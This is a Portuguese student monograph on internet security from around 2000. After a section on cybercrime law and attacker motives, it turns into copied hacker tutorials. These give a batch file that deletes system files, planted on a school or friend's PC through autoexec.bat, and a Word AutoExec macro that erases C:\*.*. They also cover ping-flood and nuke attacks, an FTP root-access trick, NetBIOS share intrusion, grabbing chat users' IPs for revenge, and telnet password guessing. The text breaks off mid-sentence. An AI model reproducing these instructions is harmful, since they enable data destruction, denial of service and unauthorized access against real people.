|
Segurança
Virtual
André
Schwebel
Lilian Ribeiro
Monografia
apresentada no curso de Organização, Sistemas
e Métodos das Faculdades
Integradas Campos Salles,
sob orientação do Professor Mauro
M. Laruccia
(Disponível
na rede desde novembro de 2000)
Introdução
Vimos
que a Internet pode oferecer uma grande economia de custos e
excelentes ganhos de produtividade, além de
oportunidades significativas para a geração de
receita. Mas para obter esses benefícios, as empresas
devem expor suas redes a ameaças à
segurança potencialmente sérias. Para que
possa se certificar de que seu patrimônio está
seguro, uma empresa deve compreender essas ameaças e
tomar as providências necessárias para proteger
informações, recursos e redes. Neste projeto
incluiremos diversos tipos de ataques e ameaças,
aspectos vulneráveis que as empresas emfrentam ao
fazer negócio na Internet e apresentaremos uma
série de programas utilizados por piratas de
computador que "estragam" seus negócios, e causam
muita confusão, e uma introdução aos
controles de segurança que podem ser usados para
conter essas ameaças.
Problemas
As
ameaças vêm tanto da Internet quanto das redes
internas, mas não na mesma proporção.
Significativamente, há mais ameaças por parte
das redes internas de uma empresa &emdash; de 80 a 95 por
cento do número total de incidentes de
segurança (de acordo com diversos estudos). Com isso,
obviamente, apenas um pequeno percentual de ameaças
realmente tem origem na própria Internet.
As
propriedades intrísecas da Internet representam a
principal fonte de sua vulnerabilidade a falhas e
ataques.
A
Internet é uma rede pública, com
comutação de pacotes; portanto, os pacotes
trafegam por rotas que não são tão bem
controladas quanto nas redes privadas: pode haver perda de
informações; talvez os sistemas não
estejam sempre funcionando de modo adequado; pessoas ocultas
podem conduzir atos de espionagem ou ataques de
falsificação ideológica a partir de
locais remotos.
Esses
e muitos outros fatores contribuem para que a Internet seja
um meio de comunicação
não-confiável e inseguro.
As
ameaças exploram os pontos fracos de um sistema,
geralmente relacionados à tecnologia ou à
política de operação. As fraquezas
tecnológicas se referem a deficiências nos
produtos de software e hardware que utilizamos e a falhas no
material de comunicação. As fraquezas na
política de operação se referem
às regras pelas quais operamos sistemas de
computador. O projeto de um sistema seguro é
tão importante quanto ter uma política de
segurança eficiente. A ameaça só
é eliminada quando so dois estão
presentes.
Uma
vez que tenham obtido acesso à sua rede, os intrusos
podem explorar suas fraquezas. Os hackers têm total
conhecimento de terminados pontos vulneráveis dos
sistemas. Na verdade, com frequencia, o fornecedor ou o
hacker divulga a existência de um bug de sistema ou de
um furo de segurança depois que o problema é
descoberto, muitos desses bugs revelados causaram grande
alvoroço, assim como o ato:
O
tão esperado ano 2000 inicio suas atividades
apresentando alguns preocupantes episódios da
psicipatologia da humanidade da era digital. Citemos uns
dois, só para refrescar a memória.
Cena
1: em janeiro, o jornal "The New York Times"revela que um
hacker roubara informações sobre parte dos 300
mil clientes cadastrados da loja virtual CD Universe
(www.cduniverse.com).
Não satisfeito, o sujeito divulgou os
números em outro site e pelo menos uns 25 mil deles
teriam sido usados por consumidores desalmados.
Cena
2: fevereiro, dia 8. Um dos sites mais populares do mundo, o
Yahoo, sofre um ataque de hackers. Desta vez, nenhum dado
é roubado. Trata-se de uma ação
basicamente de sabotagem, com milhões de
solicitações de serviço sendo enviados
simultaneamente. O objetivo: entupir os servidores da
empresa, paralisando o serviço. Os meliantes
conseguem chamar a atenção do mundo. E assim
foi nos dias seguintes, com ataques a sites como Buy.com,
e-Bay e CNN.com, entre outros. A onda chegou ao Brasil,
atacando UOL, Globo On, etc., etc.
Foi
um período caótico, particularmente para
administradores de redes e empresas de segurança. E
teríamos outros tantos episódios para compor
este thriller. Não é o caso. O certo é
que proliferam pela rede manadas de sujeitos afeitos a
hábitos bem feios: pedofilia, roubo de senhas de
cartão de crédito, promoção de
ideologias racistas etc. E põe etc. nisso.
Antes
tarde do que nunca, é hora de perguntar: o que diabos
está acontecendo? "Nada mais do que a
explosão da liberdade", diz a psicanalista (de
sistemas) Martha Ribeiro."AS pessoas nunca tiveram tanta
liberdade de expressão como têm hoje.E nem todo
mundo sabe lidar com os seus limites. Por isso alguns se
excedem e suas condutas acabam ficando à margem do
convencional".
Daí
surge a palavra-chave: marginalidade. E então
deixemos de lado abordagens pouco objetivas para cair na
vida real. OU seja: a lei. E, nesse aspecto, nosso divertido
país ainda está meio capenga.
Como
em boa parte do mundo, o Brasil ainda não está
exatamente preparado para enfrentar os crimes cometidos com
a ajudinha da Internet e, aliás, só por conta
das facilidades que ela oferece. O Código Penal em
vigor é da longíqua década de 40. Logo,
não poderia prever crimes virtuais.
Código
Adaptado
O
que se faz, hoje, é adaptar o código vigente
às armadilhas que a Internet apresenta "A grande
maioria das condutas criminosas pode ser aplicada ao mundo
virtual. Mas, para efeitos penais, é
necessária uma conduta específica , ou seja,
que aquele fato criminoso esteja previsto por uma lei
específica", explica o advogado Renato Opice
Blum, especialista em direito na Internet.
De
acordo com Blum, hoje a aplicação da pena
depende muito da interpretação do juiz. "Um
exemplo: o artigo 155 do Código Penal, que
dispõe sobre o crime de furto, exige a "coisa alheia
móvel" para a configuração do delito.
E, em se tratando de dados digitais na Internet, nem sempre
pode-se falar em coisa corpórea",
observa.
Em
um caso de furto de dados na Internet, por exemplo, Blum
entende que é necessário um acréscimo
á lei equiparando á chamada coisa alheia
móvel o furto de dados arquivados em registros
informáticos.
A
opinião é compartilhada por Alexandre Jean
Daoun, advogado paulista especializado em crimes de
informática. "Do ponto de vista criminal, temos um
grande problema com a Internet: a falta de
fronteiras.É difícil investigar se não
estabelecemos limites", analisa.
Daoun
lembra que um crime via Internet é um crime como
outro qualquer, mas o modo de execução
é diferente. O flagrante, por exemplo, é
praticamente impossível de ser feito. "Pense no
chamado crime de dano (artigo 163 do Código Penal).
Alguém violar e alterar o meu site é
equivalente a marretar meu carro. Mas e o flagrante? Temos
que acabar com a anarquia virtual".
A
saída, pelo jeito, são mesmo os adendos
à atual legislação, até porque o
Brasil tem sido pressionado por entidades internacionais a
falar grosso com seus contraventores. Os da Internet, pelo
menos...
"Para
crimes cometidos em ambientes virtuais, precisamos ter leis
e penas reais com o intuito de coibir o delito", resume o
senador Renan Calheiros, ex-ministro da Justiça e
relator de um projeto de lei que pretende definir crimes
pela Internet, estabelecendo respectivas
penas".
Hipóteses
As
ameaças e os pontos vulneráveis que você
enfrenta já foram mencionados, mas quem são
exatamente os intrusos e como eles agem? Eles são
hackers? Originalmente, o termo fazia referência aos
usuários de computador que até certo ponto
foram pioneiros na revolução da
informática, especificamente durante as
décadas de 1970 e 1980. Eles desenvolviam software
que eram distribuidos de graça na então
relativamente pequena comunidade de usuários. Com
frequência, os hackers pediam emprestado o acesso a
computadores que não estavam sendo usados, pois esse
tipo de operação era difícil de se
obter e seu custo era alto. Agora o termo é
largamente utilizado em um sentido pejorativo para fazer
referência as pessoas que obtêm acesso
não-autorizado a sistemas de computador,
especialmente àqueles que fazem isso remotamente.
Outros termos como "cracker"e "violador de rede"são
mais apropriados, pois sua conotação é
menos ambígua.
Veremos
alguns exemplos de motivos que levam essas pessoas a
praticarem seus atos:
- Ganhos
Financeiros: A pessoa busca o próprio
benefício roubando dinheiro de contas pela
internet, senhas de cartão de crédito e
muito mais.
- Vingança:
Muitos casos ocorrem por pessoas que para poderem se
vingar de outras acabam destruindo sites, arquivos do
computador (incluindo senhas) e outras redes, pessoas
deste tipo só querem "arruinar"a vida das
outras.
- Necessidade
de Aceitação: Esses ataques não
visam cobiça ou vingança apenas "status",
alguns clubes de hackers só aceitam novos membros
desde que o mesmo exiba uma ato cometido por
ele.
- Idealismo:
Pessoa que se vêem como heróis protegendo o
mundo de operações clandestinas de coleta
de dados por parte do governo.
- Curiosidade
ou Emoção: Motivo dos mais comuns onde o
intruso apenas quer saber o que existe naquele sistema,
ou acha mais excitante descobrir coisas secretas do que a
exploração de uma fronteira
eletrônica.
- Anarquia:
São chamados de phreakers, punks de computador,
causam desordem e dsicordia.
- Aprendizado:
Uma pequena parte que faz ataques para aprender mais
sobre hacking.
- Igmorância:
Intrusos que não tem a mínima
noção do que estão fazendo, mais
mesmo assim podem ser punidos.
- Espionagem
Industrial: Quando a empresa se dedica a atividades
ilegais contra outra empresa ou
organização. Para obter vantagems
competitivas.
- Espionagem
Nacional: Semelhante a anterior com uma diferença
a guerra nesse caso é entre países e
não entre empresas.
Metodologia
HACKERS
Todo
mundo sabe... eles invadem em benefício
próprio. Pegam tudo e não destroem nada.
São aqueles que invadem por diversão, para
testar conhecimentos ou pra atrapalhar a vida alheia. Por
não destruírem nada, são diferentes dos
Crackers.
CRACKERS
Os
crackers são como os hackers, mas gostam de ver a
destruição. Eles invadem e destroem só
para ver o caos depois na TV. São os ladrões
da Internet. Eles roubam dinheiro, informações
e depois apagam tudo. E sempre deixam sua marca
registrada
PHREACKERS
São
os piratas da telefonia. Eles fazem de tudo que é
relacionado aos telefones.Desde como burlar celulares, fazer
escutas em telefones convencionais e celulares, FAZER
ESCUTAS VIA TV! Isso mesmo, via TV!!! Fazer
ligações de graça, nacionais e
internacionais e muito mais.
CARDERS
Aqueles
que fazem compras com cartão de crédito alheio
ou gerado. Ou seja, os carders tem grande facilidade de
fazer compras pela internet.
Eles
invadem o sistema, pegam todos os arquivos de credit card e
distribuem no International Relay Chat (IRC) para tornar
mais difícil achar os Crackers que pegaram os
cartões.Cada Carder vai usar seu cartão em uma
parte diferente do mundo.
Nota:
Antigamente, os Carders usavam geradores de CPF,CGC, muito
fáceis de serem encontrados na Internet, talvez ainda
funcionem. E, claro, os programas que geravam números
de cartões também. Mas esses já
não funcionam mais.
Podemos
ter muitas formas de ataques, veja a seguir quais são
os mais comuns e como são feitos
OBS:
É sempre bom lembrar que a prática desses atos
é crime e pode dar cadeia, por isso pense antes de
utilizar qualquer esquema apresentado nesse trabalho, use
essas informações apenas para próprio
conhecimento de como funciona um sistema completo de ataque,
qualquer dano causado pelo mau uso dessas
informações é de total responsabilidade
da própria pessoa, sendo assim não nos
responsabilizamos por atos cometidos a outros, utilizando
essas informações.
Nuke
é uma grande arma para tirar alguém de um IRC
rápido! Funciona assim: o programa de nuke manda
informação para a pessoa no servidor, e ela
é ferrada por eles. Causará erros como "dead
Socket", "connection refused", "eof from client" e "machine
is not on the network".
Para
se utilizá-los, é nescessário um modem
rápido, 33.6 ou melhor. Também é bom
ter o Trumpet Winsock, programa que se comunica rapidamente
com o modem. Agora só é preciso um programa de
Nuke, nos recomendamos que você pegue o Senhor da
Guerra, pois ele tem vários tipos de Nukes. Depois de
pegar esses programas, é fácil ter uma
vingança, tomar canais e matar lammers
rapidamente.
Este
texto irá tratar sobre um assunto muito pouco
explorado atualmente, o DNS/IP Spoof. Essa técnica
consiste em assumir a identidade de um outro computador numa
rede, visando estabelecer o controle de uma máquina
que confie no DNS/IP de outra máquina sendo
possível assim estabelecer ma conexão sem
utilização de senha. Resolvemos tratar desse
tema porque ele é muito pouco explorado atualmente e
é realmente difícil encontrar
informações sobre ele.
Funciona
mais ou menos assim: o Servidor 1 tem um acesso
confiável no Servidor 2, isto é, não
é nescessária nenhuma senha para os dois se
comunicarem (isso nos serviços rexec, rlogin, rsh).
Achamos que fica mais fácil com esse
esquema:
Acesso
Confiável
Servidor
1 --------------------------------- Servidor
2
Portanto,
o cracker irá dizer ao Servidor 2 que seu DNS/IP
é o do Servidor 1, tornando possível a
conexão. O Spoof acontece assim: numa conexão
TCP são mandados 3 pacotes. O primeiro diz algo com
"Ei Servidor 2! eu quero me conectar com você!",
então o Servidor 2 captura esse pacote e manda um
número de sequência e, a esse número
é incrementado 128 a cada segundo e 64 após o
começo de cada conexão. Agora o cracker vira
um cego em tiroteio! Ele precisa descobrir através de
suas observações qual número de
sequência o servidor está esperando, por a
conexão de pé, e pronto. Ele está com
uma conexão forjada!
Os
ataques utilizando a técnica de spoof
técnicamente, são assim: digamos que
você quer forjar a identidade do Servidor 1.
Então, primeiro derrube-o! Nada que um SYN Flood
não faça. Agora, com base no item acima,
você deve estabelecer uma conexão, forjando a
identidade do Servidor 1 com Servidor 2. Pronto! Acho que
agora eu peguei você! Você deve estar
pensando... "e com que diabos eu vou fazer isso???".
Então sugerimos que você use um bom programa de
spoof, nos aconselhamos o spoofit. O problema é que
ele vem em código source e não podemos
escrever tudo isso aqui porque haja
paciência!
Vulnerabilidade:
spoof é um ataque ao qual não estão
sujeitos todos os SOs. Somente aqueles rodando uma
versão completa do TCP/IP. Estamos nos referindo a
Unix likes. Ou seja, máquinas rodando Windows ou DOS
não são vulneráveis. Mas Mac rodando
A/UX e PCs rodando Linux podem estar
vulneráveis sob certas circunstância: se
estiverem utilizando o X-Windows System, Serviços
Remotos (R Services), ou algum tipo de NFS mal
configurado.
ICMP
é uma maneira extremamente poderosa de tirar a
pessoa, não só de IRC, mas de sua
conexão com a internet. Funciona dessa maneira: ela
manda mensagens ICMP, em uma velocidade muito alta, causando
barulho na linha e lag. Causa tanto Lag que seu ping aumenta
terrivelmente e joga para fora do IRC. Para usar o ICMP,
você precisa de um Unix Shell Account. Por que? Porque
para usar efetivamente você precisa mais do que um
modem pode oferecer! Precisa de uma T1 pelo menos. Existem
alguns programas disponíveis para Windows, mas eles
não funcionam muito bem, não recomendamos. No
momento do ataque, é a velocidade que
importa.
Source:
ping-s
(packet size) -c (#of packets) <-f> (ip
adress)
(IP
address) é o ^!@$#!! @seja.la.o.que.for
(packet
size) tente 30 kb ou mais.
(#
of packets) mande uns 3000 (hehehe)
-f
é opcional, e serve para mandar pacotes a
20/seg.
Para
Hackear um Servidor FTP, Primeiro vc deve saber o
endereço do Host ou seu IP, para isto use o IPSCAN,
digitando o IP Principal do Host tipo
ftp.malbanet.com.br
Existem vários Programas de FTP'S, se não
quiser saber de ftp porra nenhuma use o do DOS
!!!
Vá
ao Prompt e digite FTP, ao aparece o prompt ftp>, digite
OPEN, ira abrir um outro Prompt (to), digite o nome do host
ou seu IP, tipo (to)ftp.mandic.com.br ou outro servidor. Ao
conectar ele pedirá a senha e o Password, tente user
os passwords UNIX, se não der vc deve entrar
INVISÍVEL !!!!
Como
entrar Invisível?????? No login pressione ENTER, no
password pressione Novamente... . Ira aparecer o prompt
ftp> novamente...., ai é só digitar...quote
user ftp,pressione ENTER e digite:
quote
cwd ~root
Pressione ENTER novamente e digite:
quote pass ftp
Pronto,
vc esta Hackeando...
Mas
tem um porem..., se escrever a mensagem : user restriction
aplly, vc não esta Hackeando.., pois esta aplicada a
proteção..., para isto tente com outro user
tipo quote cwd ~sys e os outros da lista UNIX....
ATENÇÃO
!!!! Não tente Hackear usando o user normal de FTP'S,
que é login : anonymous e password: seu E-Mail, pois
vai ser aplicado a proteção....ENTREI e AGORA
O QUE FAÇO??????
Ao
entrar vc vai estar no Diretório do login, tipo
\home\root\, dai, para ver a lista de users vc volta um dir
vá para o dir \home\ e cada dir é um
usuário,... não tentem pegar as senhas , pois
são Cryptografadas... Pois a maioria dos users usa a
mesma senha login.... Ok... se vc não sabe os
comandos, ai vai a dica...., se vc estiver no MS-DOS, digite
? e tecle ENTER em qualquer lugar, pois irá aparecer
os comandos... e ai é só Hackear !!!
Não fique mais que 5 Min em um servidor.
Este
texto irá ensinar, de modo fácil, destruir o
computador da sua escola (ou de amigo, trabalho, etc.).
Primeiro, crie em seu computador um arquivo de lote (nem
precisa compilar), se não souber aí vai, pelo
DOS digite: copy con arquivo.bat
@echo off
@echo Frase de sua preferência
del *.sys
del *.exe
del *.com
cd windows
del *.*
cd\
del arquivo.bat
@echo Frase de sua preferência
Agora vc criou um lote envenenado.
Remova
este arquivo (arquivo.bat) para um disquete, junto a ele um
"autoexec.bat", com a linha de comando:
C:\arquivo.bat.
Leve
o disquete para a escola (trabalho, casa de amigo, etc.) e
quando tiver uma oportunidade, insira o disco na unidade
referente (geralmente a:) e copie os arquivos para o
diretório C:\. Pronto! Retire o disco e diga
Valeu!!!To indo!!!
Invasão
porta 666
Esta
primeira maneira é feita através da port 666
que é de uso exclusivo do governo Americano. Para
invadir é fácil você deve ter um
programa de conexão via telenet (telnet que já
vem com o Windows 95 ou similar) e também um programa
chamado aabout. O que deve ser feito, este programa aabout
deve ser acionado por ambas as parte (invasor e invadido) e
o q ele faz ??? Bem, ele abre uma porta de conexão
entre os dois CPUs via a port 666. Você deve ligar o
telenet colocar no Host o numero do IP da pessoa e em port
deve-se colocar 666. Bem você já está
conectado, daí no login você deve digita cg!
(direitinho do jeito que está ao lado com o "!") e
dar um dir vendo tudo o que tem no CPU da outra
pessoa.
Ataque
através do ip
Se
vc utiliza a rede Dial-Up da droga do Windows 95 para sua
conecção com a internet pode estar correndo
sérios riscos de ter sua CPU invadida por algum
lamer, ou mesmo por um Hacker mal intensionado
(cracker).
Utilizar-se
de uma conecção PPP do Windows 95 num provedor
de acesso, significa estar disponibilizando seu computador a
todos os usuário da net. Mesmo sem o compartilhamento
de arquivos, existem diversas ferramentas que permitem a
outra pessoa conectar-se ao seu computador caso você
esteja utilizando esse tipo de
conecção.
Para
fazer isso você deve conectar-se à Internet
utilizando a rede Dial-Up do Windows 95. Se o seu provedor
não disponibilizar uma conecção do tipo
PPP, estas dicas não funcionarão. Verifique
antes, se você possui os drivers clientes para redes
Microsoft. Caso não estejam instalados, instale-os
através do Painel de Controle, no ícone Redes.
Verifique também se o compartilhamento de Arquivos e
Impressoras está instalado. Se estiver, você
estará sujeito à que outra pessoa conecte-se
ao seu computador simplesmente sabendo seu IP (Se bem que,
para aqueles que já sabem, existem mil maneiras
diferentes de se "burlar" a fraquinha segurança do
Windows 95). Para você poder encontrar outros
computadores compartilhados, você deve configurar WINS
e LMHOSTS.
O
WINS é utilizado para localizar os computadores com
IP fixo. O LMHOSTS, é acionado automaticamente na
procura de computadores que possuem IP dinâmicos.
Configurar essas opções é simples.
Vá ao Painel de Controle e abra Rede, depois
verifique as propriedades do protocolo TCP/IP. Alí
você encontrará a opção para
ativar a resolução WINS (No caso de você
não conhecer nenhum servidor WINS, utilize
204.118.34.6 como primário e 204.118.34.11 como
secundário. Esses servidores são dos USA, e
são de usos gratuíto. Caso queira outros
endereços, utilize um dos mecanismos de busca na
Internet. Para configurar o LMHOSTS, você precisa
criar um arquivo texto simples, utilizando-se até
mesmo o Bloco de Notas do Windows. O arquivo criado deve
chamar-se LMHOSTS. É nesse arquivo que ficarão
os endereços de IP e os nomes dos computadores que
você terá acesso.
Para
localizar um determinado computador, você digita o seu
número de IP e a seguir seu NetBios, na mesma linha,
separados por um espaço. Se você executar o
programa NBSTSTAT, seguido da opção -N,
você obterá essa lista, com o nome e o IP de
seu computador sempre sendo o primeiro da lista, seguido das
outras máquinas disponíveis, tudo numa janela
DOS. Através do Explorer você poderá ver
os computadores disponíveis na rede,dos quais
você ainda poderá utilizar os discos
mapeando-os, o que os tornará unidades de seu
computador.
Em
Passos:
1º
PASSO - Veja se você possui o programa
NBTSTAT;
2º
PASSO - Vá ao PROMPT do DOS;
3º
PASSO - Digite: NBTSTAT -a (IP DO CARA);
4º
PASSO - Irá aparecer se o computador da pessoa tem
compartilhamento de arquivos ou não. Se não
tiver aparecerá HOST NOT FOUND.
5º
PASSO - Se aparecer mensagens entre esta marca <03>,
você deverá pegar aquele arquivo.
6º
PASSO - Mapeie a sua unidade de disco para tornar as duas
máquinas em uma só.
7º
PASSO - No Windows vá em INICIAR, EXECUTAR e digite
"//IPdocara e dê OK.
8º
PASSO - Você invadiu por IP!!!! Mas, não se
esqueça NUNCA apague nem modifique nada apenas fusse
e veja se encontra algo que lhe interessa e depois
copie...
OBs.:
Alguns renomeiam o arquivo VNBT.386 no diretório
windows\system para não conseguirem te nukar ou te
invadir... Conselho, renomeie-o também.
Ainda
hoje existe muita gente que so é capaz de abrir o
word, editar, negritar, sublinhar e mandar para impressora,
muitos, milhares so sabem mexer no basico mesmo.
Eles
nem imaginam o que tem por traz deste riquissimo processador
de texto.
Esta
materia tem como objetivo fazer desde pequenas ate grandes
enrascadas com usuários menos informados.
PS:
Software/versao Abrangido: Word da Microsoft, versões
6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado "normal.dot" onde
estão todas as configuracões padrao do word.
Se por algum motivo este arquivo for deletado o Word cria
automaticamente quando for inicializado
Niveis de maldade
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Não é mais brincadeira.
Primeiro voce precisa criar uma macro... siga os
passos:
Entre
no Word, feche a janela de documento, não deixe
nenhum documento aberto(ativo), clique em Arquivo(File)
depois Macro, coloque no nome da macro
"AutoExec"(obrigatorio) esta macro é inicializada
toda vez que o Word for iniciado, depois clique em 'Criar',
delete as duas linhas que tiver la (Sub MAIN e End Sub) e
cole a rotina que tem logo mais abaixo.
PS:
existe outras formas/meios de criar uma macro, mas esta
é mais simples.
Nivel
1
O
nivel 1 serve para voce se mostrar, falando que entende do
Word melhor do que ninguem. Cada vez que o usuario inicia o
Word recebera uma mensagem... de alerta ou qualquer outro
coisa que sair da sua mente. veja abaixo.
Sub
MAIN
MsgBox
"Voce vai morrer, estou atrás de voce, tome cuidado
por onde anda...", "Microsoft Word", 5
MsgBox
"To falando a verdade", "FATAL ERROR", 16
MsgBox
"BABACA", "Voce não passa de 24hs", 64
End Sub
Nivel
2
É para deixar o usuario irritadissimo. no corpo da
macro cole este texto abaixo:
Sub MAIN
ArquivoNovoPadrão
Inserir "Filho"
ArquivoNovoPadrão
Inserir "da"
ArquivoNovoPadrão
Inserir "Piiiiii"
ArquivoNovoPadrão
Inserir "Filho da Piiiiii "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão Inserir "."
ArquivoNovoPadrão
Inserir "Seu Filho da Piiiiii vc vai morrer hoje "
End Sub
Nivel
3
Bom
este nivel é pura sacanagem, com ele um simples
clicar do mouse, e tudo desaparece! isto mesmo "del *.*" ou
apenas os documentos, voce é quem sabe.
Sub
MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se
de que estes macros, são gravado no arquivo default
do word, ou seja no 'normal.dot' se este arquivo for
deletado, o Word cria automaticamente na inicializacao,
então se você for fazer estas sacanagens ai
acima, proteja este arquivo, com o comando 'attrib
+r'.
Detalhes:
Existe uma forma de iniciar o Word, sem q inicialize a macro
'AutoExec' mas não falaremos, descubra você
mesmo. A macro do word é uma ferramenta riquissima,
procure fuçar. Você pode fazer estas no seu
proprio computador(so cuide!), salvando sempre no arq.
"normal.dot" depois copie apenas este arquivo para aquele
seu colega/amigo pentelho e saia de perto, para não
explodir em você. Não nos responsabilizamos por
qualquer dano que você possa causar!!!
Pegando
ip em outro chat
MODO
UM:
Já
deve ter acontecido com vc, de vc estar em um chat de WWW e
alguém te xingar. Xingar, não resolve apenas
mantém a briga! Mas que tal se vingar com um pouco
mais de classe? Seria uma boa! Que tal nukar o
indivíduo, ou entrar no server de ISP dele, e pegar a
senha dele e ameaça - lo? Isso sim é que
é estilo. Com um rastreador de IP e alguns
programinhas você poderá assusta-lo legal.
Antes de tudo pegue os seguintes programas e siga as
instruções:
Omni httpd
Ip
Cyber
Depois
de copiados os programas rode o programa IP.exe. Veja o seu
IP. Feito isso entre no OMNI HTTPD (é de instalar).
La dentro entre em properties, serves e vá em Server
root, ponha lá o diretório de onde esta as
fotos que você vai enviar pro chat. Á seguir
vá no chat e faça um link para a foto
só que ao invés de url ponha o seu IP. Depois
de enviar a foto, abra o arquivo acces.log do
diretório logs do OMNI utilizando o NotePad.
Lá vai ter os IPs de todos da sala. Se vc não
conseguiu é por que a sala não está
configurada para aceitar figuras. Entre então no
CyberKit, e ponha o seu IP na janela de hostname e clique em
Go. Vc deve tar com o IP deles!
Funcionamento: O OMNI HTTPD, serve para fazer um site com
seu IP. Quando vc envia uma foto normalmente vc está
trazendo a foto até a sala. Quando vc põe com
o nome do seu IP, é como se fosse um site. Mas o OMNI
HTTPD grava quem viu a foto. É aí que esta a
coisa!
Provavelmente
você pode não conseguir. Esta receita esta
correta! Se não conseguiu o problema esta com
você, e não aqui! Tente, não venha
reclamando caso você não consiga.
MODO
DOIS
Existe
um software chamado IPTracer, cuja sua principal finalidade
é rastrear IPs de pessoas em salas com imagens.
É muito fácil usa-lo. Após efetuar o
download do IPtracer, entre no software. Onde Ip e porta do
chat, você coloca o endereço da sala e sua
porta Em string de segredo, você escolhe o jeito de
como você quer falar com a vítima. Escolha a
vítima, em escolha a vítima, e clique em
atualizar. Os dados da vítima serão exibidos.
O que acontece? O programa envia uma imagem para a sala.
Esta imagens pega os dados do escolhido
MODO
TRÊS
Bom
agora vem o mais importante, pegar Ip em um chat que
não aceite tags HTML. Mas por incrível que
pareça é mais fácil do que pegar um Ip
em uma sala que aceite tags de HTML. O truque é o
seguinte vá ao Prompt do MSDOS e digite: arp -a isto
[arp(com o espaço)-a] Com isso irá
aparecer um monte de IPs, exemplo: [200.200.200.200]
[200.000.000.000] [200.000.000.001]
[200.000.000.002]. O primeiro IP o seu e o ultimo IP
do cara que te mandou por ultimo uma mensagem no chat. Isto,
vamos supor que o Rick te mandou uma mensagem, ele mandou:
Nike fala para VOCÊ: OI cara tudo bem? Dai você
resolve pegar o Ip dele, e vai ao prompt do MS-DOS e da o
arp -a, o ultimo IP que esta o IP do Rick, isto se
ninguém mais tiver te mandado uma mensagem neste
tempo. Chegamos a conclusão :Rick=200.000.000.002
Você=200.200.200.200 e pronto você já tem
o IP da vítima. E agora que você já sabe
como pegar o IP de uma pessoa, não perca tempo e
pegue logo o programa de nukar IP.
Bom,
como você deve saber o Ataque via Telnet é um
dos poderosos,
devido
os comandos que a mesma aceita e também suas
tentativas de entrada não são registradas e
você pode tentar quanto tempo quiser (mas nunca
exagere), mas também tem sua "parte mal", você
geralmente "cai" dos servidores "lentos" e também
demora para enviar e receber os dígitos, por enquanto
você digita ele demora um tempo para aparecer o que
você digitou, ele não envia palavra por
palavra, mas sim caracter por caracter, por isso a demora,
mas mesmo assim, ele é fundamental para quem
tá querendo alguma coisa boa...
Vamos
ao ataque:
Entre
na Home Page de algum servidor através de seu
browser, e procure pela lista de home pages pessoais.
Passando o mouse sobre os links que levam à
página de cada usuário você pode
perceber um padrão do tipo:
http://www.servidor.com.br/~usuário
Onde
"usuário" é o login do dono da página.
Se você usa o Windows 95 vá ao prompt do MSDOS,
digite telnet e tecle ENTER. Surgirá uma janela no
Win95 com o programa Telnet.
Se
você usa outro sistema operacional, inicie seu
programa de telnet. .
Conecte-se
ao host do servidor (Ex.: www.plisnet.com.br). Então
entre com o Login de um dos usuários (olhando na
lista de home pages) e use como senha esse mesmo
login.
Tente
com todos os usuários. No final você
deverá ter algumas senhas. Se você quiser mais
senhas de usuários, utilize a lógica,
relacionando a senha com o login (ex.: login: kurt senha:
cobain). Vamos a um breve comentário sobre a
Telnet:
TELNET
(Protocolo de Terminal Virtual) é o protocolo
Internet para estabelecer a conexão entre
computadores. Através dessa conexão remota,
pode-se executar programas e comandos em outra
máquina, como se o teclado de seu computador
estivesse ligado diretamente a ela. O visual de uma
conexão via Telnet é semelhante ao que se tem
em BBS's de interface Dos, e a operação do
computador remoto se dá da mesma forma, ou seja,
através de uma linha de comandos Unix ou a partir de
um menu de comandos disponíveis que sempre se
apresenta em algum lugar da tela (esta última forma
é a mais comum em servidores que permitem acesso
público).
O Telnet pode ser usado para a pesquisa de
informações e transferência de arquivos
- tudo depende do que o computador ao qual você
está conectado permitir que você faça.
Ele também é muito usado por operadores de
sistemas (Sysop's) a fim de fazer algum tipo de
manutenção (se você pensa que o Sysop de
seu provedor sai de casa toda vez que tem algum problema nos
servidores, está muito enganado, muitas vezes ele faz
a manutenção de casa mesmo, via
Telnet.)
Para
fazer uma conexão via Telnet, é
necessário um programa específico. O Windows
95 já vem com um (procure no diretório
c:\windows o programa Telnet.exe - deve estar
lá).
Veja
abaixo alguns endereços onde você pode fazer
uma conexão Telnet: netfind.if.usp.br : Busca mundial
de usuários na Internet.
Digite
netfind ao estabelecer a conexão.
ned.ipac.caltech.edu: Banco de dados Extragalático da
NASA/IPAC.
Digite
ned na conexão.
spacelink.msfc.nasa.gov
: Banco de dados da NASA. Digite guest ao se conectar.
stis.nsf.gov : Informações científicas
e tecnológicas. Digite public na
conexão.
Veja
também alguns comandos que podem ser usados na
Telnet:
ls
-l lista os arquivos de um diretório
ls
-al lista todos os arquivos de um diretório, mesmo os
Hidden
cp
x y copia o arquivo do diretório x para o
diretório y (o caminho de diretório deve ser
colocado por inteiro)
mv
x y move o arquivo do diretório x para o
diretório y (o caminho de diretório deve ser
colocado por inteiro)
rm
x deleta o arquivo x
cd
xxx muda o diretório ativo para xxx
cd
.. muda o diretório ativo para o que está
'acima' do atual
mkdir
xxx cria o diretório xxx dentro do diretório
atual
rm
xxx remove o diretório xxx
Manual
do anonimyzer:Qualquer Home-Page que você visita pode
muito bem obter informações sobre você,
como por exemplo: Provedor, endereço IP, sistema
operacional que esta usando, Browser que esta usando e
talvez o e-mail.
O Anonymizer http://www.anonymizer.com age como
intermediário entre o seu programa de
navegação e os outros websites. Assim sendo,
ele impede que o site visitado tenha acesso a qualquer tipo
de informação sua. Para usar o serviço,
você deve anteceder os URLs com o seguinte
endereço do Anonymizer
http://www.anonymizer.com:8080
Se
você quiser acessar a home-page da Microsoft, por
exemplo, e não quiser que ela obtenha seus dados,
você deve digitar no seu navegador
http://www.anonymizer.com:8080/http://www.microsoft.com
Pronto desta forma você poderá' até
mesmo usar aquelas senhas de sites eróticos, que
